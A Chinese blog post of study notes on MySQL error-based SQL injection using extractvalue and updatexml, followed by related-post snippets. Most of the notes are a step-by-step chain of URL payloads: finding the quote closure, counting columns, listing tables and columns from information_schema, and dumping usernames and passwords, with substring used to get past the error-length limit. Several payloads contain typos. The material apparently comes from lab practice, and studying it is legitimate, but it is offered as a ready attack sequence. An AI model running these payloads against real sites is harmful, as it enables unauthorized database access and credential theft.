报错注入笔记

已于 2022-11-25 20:54:00 修改
阅读量193 收藏
点赞数
文章标签: 数据库 sql
于 2022-11-23 21:29:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73856630/article/details/127988315
版权

1.使用extractvalue查询xml里面的内容

        select extractvalue(列名,'路径')from xml;

                查询路径写错查不到东西,但不会报错

                格式写错,提升报错信息

                 路径是/开头

                                列名可以随便写

或updatexml
函数uodatexml(xml_document,xpath_string,new_value)
参数一 是xml文档对象名称
参数二是路径
参数三是替换查找符合条件的数据
报错原理同extractvalue相同
输错第二个参数

               

2.concat拼接

        concat(1,2)=12

                ?id=100' union select 1,extractvalue(concat(0x7e,(select database()))),3 --+

                ?id=100' and 1=extractvalue(1,concat(0x7e,(select database()))) --+

3.路径前加~报错

4.substring函数或substr

        substring(内容,起始位,位数)

(1)

闭合方式 id=1' and 1=2--+无查询结果

(2)

列数id=1' group by 3--+

(3)

---union select 1,2,datadase()

(4)

?id=1' union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name))from information_schema.tables where table_schema=database()))),3 --+

(5)

?id=1' union select 1,extractvalue(1,concat(0x7e,(select group_concat(column_name))from information_schema.columns where table_schema=database() and table_name='user‘表名))),3 --+

(6)

?id=1' union select 1,extractvalue(1,concat(0x7e,(select group_concat(column_name))from information_schema.columns where table_schema=database() and table_name='user‘表名))),3 --+

(7)

?id=1' union select 1,extractvalue(1,concat(0x7e,(select group_concat(username,'~',password))from user))) --+

使用函数substring解决只能返回32个字符串问题

(8)

?id=1' union select 1,extractvalue(1,concat(0x7e,(select substring(group_concat(username,'~',password),25,30))from user))) --+

或者

?id=1" and 1=updatexml(1,concat('~',(select substring(group_concat(username,password),1,30)) from users)),2)--+

hhh253
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
mysql 注入 技巧_Mysql注入小技巧方法
weixin_29088655的博客
02-01 276
一、字符串截取函数平时我们进行盲注时用substr()函数截取字符串,当substr()被过滤时,怎么办呢?我们可以用这些函数可以达到同样的效果1.left(str, length)从左边第length位开始截取字符串用法:left(str, length),即:left(被截取字符串, 截取长度)SELECT LEFT('www.baidu.com',8)结果为:www.baid2.right(...
updatexml函数
m0_62092622的博客
01-27 9165
先介绍一下updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称 第二个参数:XPath_string (Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以sql-labs第十七关为例 由于本关username过滤比较严格,所以password就成了注入点 根据来获取所需要的信...
updataxml注入
bangyan3903的博客
08-17 890
// take the variables//接受变量 // //也就是插入post提交的uname和passwd,参见:https://www.w3school.com.cn/sql/sql_insert.asp if(isset($_POST['uname']) && isset($_POST['passwd'])) { //making sure u...
SQL 注入漏洞(七)注入
不秃头的程序Yang
06-12 1031
一、代码分析 二、注入攻击 1、获取库名
自己整理MySQL盲注
明哥哥知识分享
08-17 926
一、基于时间延时的盲注:SLEEP 函数 SLEEP( 数字) 函数使用说明:延迟函数,为真时会延时执行代码,为假则不会执行延时。(数字为整数,例:1就是延迟一秒执行。) 例如: Select * from 表名 where id=1 and sleep(2); 有这个id=1的内容延迟2秒执行,没有则相反。 二、配合if条件触发 IF(expr1, expr2, expr3) 如果IF(1>2, 真, 假)是true,那它的返回值就是真,如果执行条件是false,执行的条件就是假,具体情况视其所在
树懒_day13_jdbc_sql注入笔记
08-06
移动开发小白树懒,在学习jdbc.对于代码的优化和API的使用做了一些详细的理解..
手工注入常用SQL语句笔记.docx
04-10
* 注入 * UNION 联合查询型注入 * 时间延迟型盲注 * 堆查询注入 三、判断数据库类型 * Access:and (select id from MSysAccessObjects) >0 返回正常说明是 Access * MSSQL:and (select id from ...
Mybatis plus 尚硅谷笔记
最新发布
03-06
Mybatis Plus 笔记 Mybatis Plus 是一个基于 Mybatis 框架的插件,提供了许多实用的功能来简化数据访问层的开发。下面是 Mybatis Plus 的一些特性和使用说明。 Mybatis Plus 特性 1. 内置通用 mapper 和 service ...
1026-老师笔记1
08-03
联合查询、排序、布尔注入、延迟注入注入是常见的注入技术。例如,`?id=1 and exists(select * from admin)` 可用于检测是否存在特定的数据库表。SQLmap是一个强大的自动化工具,可用于检测和利用SQL注入漏洞...
java学习笔记JDK6课件之十七
07-15
Java学习笔记JDK6课件第17章主要讲解了注解(Annotation)的使用,注解是Java语言中一种非常重要的元数据机制,它允许程序员在源代码中嵌入额外的信息,这些信息可以被编译器、IDE或运行时环境读取,以实现特定的功能...
java,html,jquery,js各种解决方案
09-01
8. **Spring+MyBatis+SpringMVC**:这是常见的Java后端开发框架组合,可能涉及配置、注入、数据库连接等。通过阅读官方文档,了解这些框架的工作原理和最佳实践,可以更有效地排查问题。 9. **MySQL**:MySQL是...
学习Spring笔记_Annotation(注解)_Autowired_Qualifier
08-05
默认情况下,Spring会根据Bean的类型来匹配,如果存在多个相同类型的Bean,Spring会,这时就需要配合`@Qualifier`注解来指定具体要注入的Bean。 例如,假设我们有以下两个Bean: ```java @Component("service1...
代码检测工具
04-27
例如,SonarQube是一款综合性的代码质量管理平台,它能检测SQL注入、跨站脚本(XSS)等安全风险,以及代码复杂度过高和重复代码等问题。 在实际开发环境中,代码检测工具通常集成到持续集成/持续部署(CI/CD)流程...
前端笔记录,前端的学习历程
06-16
Angular则是由Google开发的全功能框架,提供了双向数据绑定、依赖注入等高级特性,适合大型企业级应用。 在前端学习过程中,误集的整理是必不可少的。开发者会遇到各种各样的,如语法误、类型误、运行时...
一道综合渗透题引发的updatexml()注入思考
Grey的博客
05-09 1万+
MYSQL数据库updatexml注入UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格...
mysql xml函数_MYSQL updatexml()函数注入解析
weixin_42188533的博客
02-27 1128
MYSQL updatexml()函数注入解析首先了解下updatexml()函数UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参...
学习笔记UpdateXml() MYSQL显注入
明哥哥知识分享
08-15 568
在学习之前,需要先了解 UpdateXml() 。 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值 然后咱们再看看语句:http://
学习基于extractvalue()和updatexml()的注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值